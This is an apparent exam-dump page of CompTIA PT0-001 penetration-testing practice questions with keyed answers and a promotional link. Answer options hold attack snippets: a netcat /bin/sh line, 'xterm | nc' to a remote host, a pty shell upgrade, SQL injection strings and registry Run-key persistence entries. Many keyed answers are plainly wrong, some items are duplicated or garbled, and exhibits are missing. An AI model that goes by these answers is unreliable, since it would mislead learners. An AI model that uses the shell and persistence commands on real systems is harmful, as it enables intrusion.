Latest [Sep 07, 2021] CompTIA PT0-001 Exam Practice Test To Gain Brilliante Result
Take a Leap Forward in Your Career by Earning CompTIA PT0-001
NEW QUESTION 58
: 88
A penetration tester was able to enter an SQL injection command into a text box and gain access to the information store on the database. Which of the following is the BEST recommendation that would mitigate the vulnerability?
- A. Install host-based intrusion detection
- B. Randomize the credentials used to log in
- C. Perform system hardening
- D. Implement input normalization
Answer: C
NEW QUESTION 59
In which of the following components is an exploited vulnerability MOST likely to affect multiple running application containers at once?
- A. Configuration files
- B. Common libraries
- C. ASLR bypass
- D. Sandbox escape
Answer: C
NEW QUESTION 60
After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's folder titled "changepass"
-sr -xr -x 1 root root 6443 Oct 18 2017 /home/user/changepass
Using "strings" to print ASCII printable characters from changepass, the tester notes the following:
$ strings changepass
Exit
setuid
strmp
GLINC _2.0
ENV_PATH
%s/changepw
malloc
strlen
Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machines?
- A. Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary title changepw
- B. Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of '/usr/local/bin'
- C. Create a copy of changepass in the same directory, naming it changpw. Export the ENV_PATH environmental variable to the path "/home/user'. Then run changepass
- D. Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass
Answer: B
NEW QUESTION 61
Performance based
You are a penetration Inter reviewing a client's website through a web browser.
Instructions:
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate source or cookies.
Answer:
Explanation:
Explanation
Step 1
Generate a Certificate Signing Request
Step 2
Submit CSR to the CA
Step 3
Installed re-issued certificate on the server
Step 4
Remove Certificate from Server
NEW QUESTION 62
A penetration tester wants to check manually if a "ghost" vulnerability exists in a system. Which of the following methods is the correct way to validate the vulnerability?
- A. Download the GHOST file to a Windows system and compilegcc -o GHOST GHOST.ctest i:./GHOST
- B. Download the GHOST file to a Linux system and compilegcc -o GHOST.ctest i:./GHOST
- C. Download the GHOST file to a Linux system and compilegcc -o GHOSTtest i:./GHOST
- D. Download the GHOST file to a Windows system and compilegcc -o GHOSTtest i:./GHOST
Answer: A
NEW QUESTION 63
A penetration tester is designing a phishing campaign and wants to build list of users (or the target organization. Which of the following techniques would be the MOST appropriate?
(Select TWO)
- A. Query an Internet WHOIS database.
- B. Socially engineer the corporate call center.
- C. Search posted job listings.
- D. Scrape the company website.
- E. Harvest users from social networking sites.
Answer: A,C
NEW QUESTION 64
Black box penetration testing strategy provides the tester with:
- A. a target list
- B. source code
- C. privileged credentials
- D. a network diagram
Answer: C
Explanation:
Explanation
References: https://www.scnsoft.com/blog/fifty-shades-of-penetration-testing
NEW QUESTION 65
A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?
- A. MAC address of the client
- B. MAC address of the gateway
- C. MAC address of the web server
- D. MAC address of the domain controller
Answer: B
NEW QUESTION 66
A penetration tester has been hired to perform a penetration test for an organization. Which of the following is indicative of an error-based SQL injection attack?
- A. 1=1 or b--
- B. 1=1 or a--
- C. 1=1 or 2--
- D. a=1 or 1--
Answer: D
NEW QUESTION 67
Joe, an attacker, intends to transfer funds discreetly from a victim's account to his own. Which of the following URLs can he use to accomplish this attack?
- A. https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&se
1=1 AND select username from testbank.custinfo where username like 'Joe' &amount=200 - B. https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&se
1=1 AND select username from testbank.custinfo where username like 'Joe' &amount=200 - C. https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&se
1=1 AND select username from testbank.custinfo where username like 'Joe' &amount=200 - D. https://testbank.com/BankingApp/ACH.aspx?CustID=435345&accountType=F&action-ACHTransfer&se
1=1 AND select username from testbank.custinfo where username like 'Joe'&amount=200
Answer: B
NEW QUESTION 68
Given the following script:
Which of the following BEST describes the purpose of this script?
- A. Keystroke monitoring
- B. Event logging
- C. Debug message collection
- D. Log collection
Answer: A
NEW QUESTION 69
A company hires a penetration tester to determine if there are any vulnerabilities in its new VPN concentrator installation with an external IP of 100.170.60.5. Which of the following commands will test if the VPN is available?
- A. nc 100.170.60.5 8080 /bin/sh
- B. ike-scan -A -t 1 --sourceip=apoof_ip 100.170.60.5
- C. fpipe.exe -1 8080 -r 80 100.170.60.5
- D. nmap -sS -A -f 100.170.60.5
Answer: B
NEW QUESTION 70
Performance based
You are a penetration Inter reviewing a client's website through a web browser.
Instructions:
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate source or cookies.
Answer:
Explanation:
NEW QUESTION 71
A penetration tester runs the following from a compromised box 'python -c -import pty;Pty.sPawn( "/bin/bash").' Which of the following actions is the tester taking?
- A. Upgrading the shell
- B. Creating a sandbox
- C. Capturing credentials
- D. Removing the Bash history
Answer: D
NEW QUESTION 72
Black box penetration testing strategy provides the tester with:
- A. a target list
- B. source code
- C. privileged credentials
- D. a network diagram
Answer: C
Explanation:
Explanation/Reference:
References: https://www.scnsoft.com/blog/fifty-shades-of-penetration-testing
NEW QUESTION 73
A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP
192.168.1.10. Which of the following would accomplish this task?
- A. From the local computer, run the following command
ssh -L4444 : 127.0.01:6000 -% [email protected] xterm - B. From the local computer, run the following command
Nc -1 -p 6000
Then, from the remote computer, run the following command
Xterm | nc 192.168.1.10 6000 - C. From the remote computer, run the following commands:
Export IHOST 192.168.1.10:0.0
xhost+
Terminal - D. From the local computer, run the following command
ssh -r6000 : 127.0.01:4444 -p 6000 [email protected] "xhost+; xterm"
Answer: C
NEW QUESTION 74
A penetration tester observes that the content security policy header is missing during a web application penetration test.
Which of the following techniques would the penetration tester MOST likely perform?
- A. Directory traversal attack
- B. Command injection attack
- C. Remote file inclusion attack
- D. Clickjacking attack
Answer: A
Explanation:
References: https://geekflare.com/http-header-implementation/
NEW QUESTION 75
A penetration tester has gained access to a marketing employee's device. The penetration tester wants to ensure that if the access is discovered, control of the device can be regained. Which of the following actions should the penetration tester use to maintain persistence to the device? (Select TWO.)
- A. Place a script in C:\users\%username\local\appdata\roaming\temp\au57d.ps1.
- B. Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d.ps1.
- C. Place an entry for RTAudio in HKLM\CurrentControlSet\Services\RTAudio.
- D. Create a schedule task to call C:\windows\system32\drivers\etc\hosts.
- E. Create a fake service in Windows called RTAudio to execute manually.
- F. Place an entry in C:\windows\system32\drivers\etc\hosts for 12.17.20.10 badcomptia.com.
Answer: B,C
NEW QUESTION 76
A penetration tester successfully exploits a Windows host and dumps the hashes Which of the following hashes can the penetration tester use to perform a pass-the-hash attack?
A)
B)
C)
D)
- A. Option A
- B. Option D
- C. Option B
- D. Option C
Answer: B
NEW QUESTION 77
A penetration tester successfully exploits a Windows host and dumps the hashes Which of the following hashes can the penetration tester use to perform a pass-the-hash attack?
A)
B)
C)
D)
- A. Option A
- B. Option D
- C. Option B
- D. Option C
Answer: B
NEW QUESTION 78
Click the exhibit button.
A penetration tester is performing an assessment when the network administrator shows the tester a packet sample that is causing trouble on the network. Which of the following types of attacks should the tester stop?
- A. SNMP brute forcing
- B. ARP spoofing
- C. SMTP relay
- D. DNS cache poisoning
Answer: A
NEW QUESTION 79
A penetration tester has run multiple vulnerability scans against a target system. Which of the following would be unique to a credentialed scan?
- A. Detailed service configurations
- B. Unpatched third-party software
- C. Weak access control configurations
- D. Exploits for vulnerabilities found
Answer: D
NEW QUESTION 80
......
Authentic Best resources for PT0-001 Online Practice Exam: https://www.getvalidtest.com/PT0-001-exam.html